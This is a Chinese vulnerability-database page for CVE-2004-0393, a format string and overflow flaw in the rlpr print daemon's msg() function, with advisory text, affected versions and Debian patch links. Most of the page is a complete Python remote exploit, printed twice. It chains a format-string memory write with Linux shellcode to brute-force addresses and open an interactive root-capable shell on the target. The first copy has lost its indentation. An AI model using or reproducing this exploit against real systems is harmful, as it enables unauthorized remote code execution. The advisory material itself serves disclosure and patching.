CVE-2004-0393
CVSS10.0
发布时间 :2004-12-06 00:00:00
修订时间 :2016-10-17 22:44:57
NMCOES    

[原文]Format string vulnerability in the msg function for rlpr daemon (rlprd) 2.0.4 allows remote attackers to execute arbitrary code via format string specifiers in a buffer that can not be resolved, which is provided to the syslog function.


[CNNVD]Rlpr msg()函数多个安全漏洞(CNNVD-200412-033)

        
        rlpr是一款不使用/etc/printcap的lpd打印工具。
        rlpr包含的msg()函数存在格式串和缓冲区溢出问题,本地或远程攻击者可以利用这个漏洞以rlprd进程权限执行任意指令。
        问题一是msg()调用syslog函数记录时没有进行任何过滤,提交格式串数据可能破坏内存信息。另外msg()函数对输入缺少充分缓冲区边界检查,可导致缓冲区溢出攻击。精心构建提交数据可能以rlprd进程(远程)或者root(本地)权限执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:rlpr:rlpr:2.0.4
cpe:/a:rlpr:rlpr:2.0.2
cpe:/a:rlpr:rlpr:2.0.3
cpe:/a:rlpr:rlpr:2.0.1
cpe:/a:rlpr:rlpr:2.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0393
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0393
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-033
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=108810992313652&w=2
(UNKNOWN)  BUGTRAQ  20040624 Rlpr Advisory
http://www.debian.org/security/2004/dsa-524
(VENDOR_ADVISORY)  DEBIAN  DSA-524
http://www.securityfocus.com/bid/10578
(VENDOR_ADVISORY)  BID  10578
http://xforce.iss.net/xforce/xfdb/16453
(VENDOR_ADVISORY)  XF  rlpr-msg-format-string(16453)

- 漏洞信息

Rlpr msg()函数多个安全漏洞
危急 输入验证
2004-12-06 00:00:00 2005-10-20 00:00:00
远程  
        
        rlpr是一款不使用/etc/printcap的lpd打印工具。
        rlpr包含的msg()函数存在格式串和缓冲区溢出问题,本地或远程攻击者可以利用这个漏洞以rlprd进程权限执行任意指令。
        问题一是msg()调用syslog函数记录时没有进行任何过滤,提交格式串数据可能破坏内存信息。另外msg()函数对输入缺少充分缓冲区边界检查,可导致缓冲区溢出攻击。精心构建提交数据可能以rlprd进程(远程)或者root(本地)权限执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        rlpr rlpr 2.0 2:
        Debian Upgrade rlpr_2.02-7woody1_alpha.deb
        
        http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_alpha.deb

        Debian GNU/Linux 3.0 (woody)
        Debian Upgrade rlpr_2.02-7woody1_arm.deb
        
        http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_arm.deb

        Debian GNU/Linux 3.0 (woody)
        Debian Upgrade rlpr_2.02-7woody1_i386.deb
        
        http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_i386.deb

        Debian GNU/Linux 3.0 (woody)
        Debian Upgrade rlpr_2.02-7woody1_ia64.deb
        
        http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_ia64.deb

        Debian GNU/Linux 3.0 (woody)
        Debian Upgrade rlpr_2.02-7woody1_hppa.deb
        
        http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_hppa.deb

        Debian GNU/Linux 3.0 (woody)
        Debian Upgrade rlpr_2.02-7woody1_m68k.deb
        
        http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_m68k.deb

        Debian GNU/Linux 3.0 (woody)
        Debian Upgrade rlpr_2.02-7woody1_mips.deb
        
        http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_mips.deb

        Debian GNU/Linux 3.0 (woody)
        Debian Upgrade rlpr_2.02-7woody1_mipsel.deb
        
        http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_mipsel.deb

        Debian GNU/Linux 3.0 (woody)
        Debian Upgrade rlpr_2.02-7woody1_powerpc.deb
        
        http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_powerpc.deb

        Debian GNU/Linux 3.0 (woody)
        Debian Upgrade rlpr_2.02-7woody1_s390.deb
        
        http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_s390.deb

        Debian GNU/Linux 3.0 (woody)
        Debian Upgrade rlpr_2.02-7woody1_sparc.deb
        
        http://security.debian.org/pool/updates/main/r/rlpr/rlpr_2.02-7woody1_sparc.deb

        Debian GNU/Linux 3.0 (woody)

- 漏洞信息 (307)

rlpr <= 2.04 msg() Remote Format String Exploit (EDBID:307)
linux remote
2004-06-25 Verified
7290 jaguar
N/A [点击下载]
# by jaguar
#!/usr/bin/python
import os, sys, socket, struct, time, telnetlib

class rlprd:
fd = None
pad = 2 

#00000000  31DB              xor ebx,ebx
#00000002  F7E3              mul ebx
#00000004  B003              mov al,0x3
#00000006  80C304            add bl,0x4
#00000009  89E1              mov ecx,esp
#0000000B  4A                dec edx
#0000000C  CC                int3
#0000000D  CD80              int 0x80
#0000000F  FFE1              jmp ecx

# read(4, esp, -1); jmp ecx
lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1"
lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc
# dup2 shellcode(4->0,1,2)
lnx_stage_two  = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04" 
lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
# execute /bin/sh 
lnx_stage_two += "\x90" * 100
lnx_stage_two += "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68"
lnx_stage_two += "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
lnx_stage_two += "\xe1\x8d\x42\x0b\xcd\x80"

targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ] 

bruteforce = 0

def __init__(self, host, os, target, port=7290):
self.host = host
self.port = port

set = 0
if(os == "linux"):
set = 1
self.stage_one = self.lnx_stage_one
self.stage_two = self.lnx_stage_two

if(set == 0):
print "Unknown OS"
os._exit()

self.os = os

if(target == 0):
self.bruteforce = 1
else: 
self.args = self.targets[target]

def wl16(self, write_byte):
write_byte += 0x10000
self.already_written %= 0x10000
padding = (write_byte - self.already_written) % 0x10000
if(padding < 10):
padding += 0x10000

self.already_written += padding

return padding

def connect(self):
#if self.fd is not None:
# self.fd.close()
# self.fd = None

self.fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
self.fd.connect((self.host, self.port))

def exploit(self, where, what):
if(not self.fd or self.fd is None): self.connect()
self.already_written = len('gethostbyname(')

#print "# of nops: %d\n" % (23 - len(self.readsc))

exploit = "x" * self.pad
self.already_written += self.pad

exploit += struct.pack("<l", where)
exploit += struct.pack("<l", where + 2)
self.already_written += 8 

l = self.wl16(what & 0xffff)
fill = "%1$" + str(l) + "u"
exploit += fill

exploit += "%7$hn"

l = self.wl16(what >> 16)
fill = "%1$" + str(l) + "u"
exploit += fill

exploit += "%8$hn"

#print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit))
#print "[*] Stage 1 length: %d" % len(self.stage_one)

#time.sleep(5)
try:
self.fd.send(exploit + self.stage_one + "\n")
self.fd.send(self.stage_two)
time.sleep(1)
self.fd.send("echo spawned; uname -a; id -a;\n")
print "Recieved: " + self.fd.recv(1024)
except:
self.fd.close()
self.fd = None 
print "\tFailed @ 0x%08x" % what
return 0

remote = telnetlib.Telnet()
remote.sock = self.fd
print "[*] You should now have a shell"
remote.interact()
os.exit(0)

def force(self, where, high, lo):
for i in range(high, lo, -8):
r.exploit(where, i)

def run(self):
if(self.bruteforce):
print "Bruteforcing.."
#print "not implemented yet"
#os._exit(1)
for i in range(0x0804c000, 0x0804d000, 0x100 / 6):
print "Trying: 0x%08x" % i
self.force(i, 0xbffffa00, 0xbffff9c0)

#self.exploit(self.args[1], self.args[2])

if __name__ == '__main__':
if(len(sys.argv) != 4):
print "%s host [linux] targetid"
print "- 0 to brute force"
print "- 1 custom compile"
os._exit(0)

print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3])
r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3]))
#r.exploit(0x0804c418, 0xbffff9e8)
#r.force(0x0804c418, 0xbffffa00, 0xbffff800)
r.run()


# milw0rm.com [2004-06-25]
		

- 漏洞信息 (24223)

Rlpr 2.0 msg() Function Multiple Vulnerabilities (EDBID:24223)
linux remote
2004-06-19 Verified
0 jaguar@felinemenace.org
N/A [点击下载]
source: http://www.securityfocus.com/bid/10578/info

It is reported that rlpr is prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to execute arbitrary code in order to gain unauthorized access.

The application is affected by a format string vulnerability. This vulnerability presents itself due to insufficient sanitization of user-supplied data through the 'msg()' function.

The 'msg()' function is also affected by a buffer overflow vulnerability. This issue occurs due to insufficient boundary checking and may also be exploited to gain unauthorized access to a vulnerable computer. 

rlpr versions 2.04 and prior are affected by these issues.

#!/usr/bin/python
import os, sys, socket, struct, time, telnetlib

class rlprd:
	fd = None
	pad = 2 

	#00000000  31DB              xor ebx,ebx
	#00000002  F7E3              mul ebx
	#00000004  B003              mov al,0x3
	#00000006  80C304            add bl,0x4
	#00000009  89E1              mov ecx,esp
	#0000000B  4A                dec edx
	#0000000C  CC                int3
	#0000000D  CD80              int 0x80
	#0000000F  FFE1              jmp ecx
	
	# read(4, esp, -1); jmp ecx
	lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1"
	lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc
	# dup2 shellcode(4->0,1,2)
	lnx_stage_two  = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04" 
	lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
	# execute /bin/sh	
	lnx_stage_two += "\x90" * 100
	lnx_stage_two += "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68"
	lnx_stage_two += "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
	lnx_stage_two += "\xe1\x8d\x42\x0b\xcd\x80"

	targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ] 
		
	bruteforce = 0

	def __init__(self, host, os, target, port=7290):
		self.host = host
		self.port = port

		set = 0
		if(os == "linux"):
			set = 1
			self.stage_one = self.lnx_stage_one
			self.stage_two = self.lnx_stage_two

		if(set == 0):
			print "Unknown OS"
			os._exit()

		self.os = os
		
		if(target == 0):
			self.bruteforce = 1
		else:	
			self.args = self.targets[target]

	def wl16(self, write_byte):
		write_byte += 0x10000
		self.already_written %= 0x10000
		padding = (write_byte - self.already_written) % 0x10000
		if(padding < 10):
			padding += 0x10000

		self.already_written += padding

		return padding

	def connect(self):
		#if self.fd is not None:
		#	self.fd.close()
		#	self.fd = None

		self.fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
		self.fd.connect((self.host, self.port))
	
	def exploit(self, where, what):
		if(not self.fd or self.fd is None): self.connect()
		self.already_written = len('gethostbyname(')

		#print "# of nops: %d\n" % (23 - len(self.readsc))

		exploit = "x" * self.pad
		self.already_written += self.pad

		exploit += struct.pack("<l", where)
		exploit += struct.pack("<l", where + 2)
		self.already_written += 8		

		l = self.wl16(what & 0xffff)
		fill = "%1$" + str(l) + "u"
		exploit += fill

		exploit += "%7$hn"
		
		l = self.wl16(what >> 16)
		fill = "%1$" + str(l) + "u"
		exploit += fill

		exploit += "%8$hn"

		#print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit))
		#print "[*] Stage 1 length: %d" % len(self.stage_one)

		#time.sleep(5)
		try:
			self.fd.send(exploit + self.stage_one + "\n")
			self.fd.send(self.stage_two)
			time.sleep(1)
			self.fd.send("echo spawned; uname -a; id -a;\n")
			print "Recieved: " + self.fd.recv(1024)
		except:
			self.fd.close()
			self.fd = None 
			print "\tFailed @ 0x%08x" % what
			return 0

		remote = telnetlib.Telnet()
		remote.sock = self.fd
		print "[*] You should now have a shell"
		remote.interact()
		os.exit(0)

	def force(self, where, high, lo):
		for i in range(high, lo, -8):
			r.exploit(where, i)

	def run(self):
		if(self.bruteforce):
			print "Bruteforcing.."
			#print "not implemented yet"
			#os._exit(1)
			for i in range(0x0804c000, 0x0804d000, 0x100 / 6):
				print "Trying: 0x%08x" % i
				self.force(i, 0xbffffa00, 0xbffff9c0)

		#self.exploit(self.args[1], self.args[2])

if __name__ == '__main__':
	if(len(sys.argv) != 4):
		print "%s host [linux] targetid"
		print "- 0 to brute force"
		print "- 1 custom compile"
		os._exit(0)

	print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3])
	r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3]))
	#r.exploit(0x0804c418, 0xbffff9e8)
	#r.force(0x0804c418, 0xbffffa00, 0xbffff800)
	r.run()

		

- 漏洞信息

7195
rlpr msg() Format String Error
Local Access Required, Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

rlpr contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered due to a format string error in the msg() function. This flaw may lead to a loss of integrity.

- 时间线

2004-06-19 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 2.05 or higher, as it has been reported to fix this vulnerability. In addition, Debian has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Rlpr msg() Function Multiple Vulnerabilities
Input Validation Error 10578
Yes No
2004-06-19 12:00:00 2009-07-12 05:16:00
The format string issue was discovered by jaguar@felinemenace.org. The buffer overflow issue was disclosed by Debian.

- 受影响的程序版本

rlpr rlpr 2.0 4
rlpr rlpr 2.0 3
rlpr rlpr 2.0 2
rlpr rlpr 2.0 1
rlpr rlpr 2.0

- 漏洞讨论

It is reported that rlpr is prone to multiple vulnerabilities. These vulnerabilities can allow a remote attacker to execute arbitrary code in order to gain unauthorized access.

The application is affected by a format string vulnerability. This vulnerability presents itself due to insufficient sanitization of user-supplied data through the 'msg()' function.

The 'msg()' function is also affected by a buffer overflow vulnerability. This issue occurs due to insufficient boundary checking and may also be exploited to gain unauthorized access to a vulnerable computer.

rlpr versions 2.04 and prior are affected by these issues.

- 漏洞利用

CORE has developed a working commercial exploit for their IMPACT
product. This exploit is not otherwise publicly available or known
to be circulating in the wild.

An exploit has been provided by jaguar@felinemenace.org.

- 解决方案

Debian has released an advisory (DSA 524-1) to address these issues. Please see the referenced advisory for more information about obtaining fixes.

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.


rlpr rlpr 2.0 2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站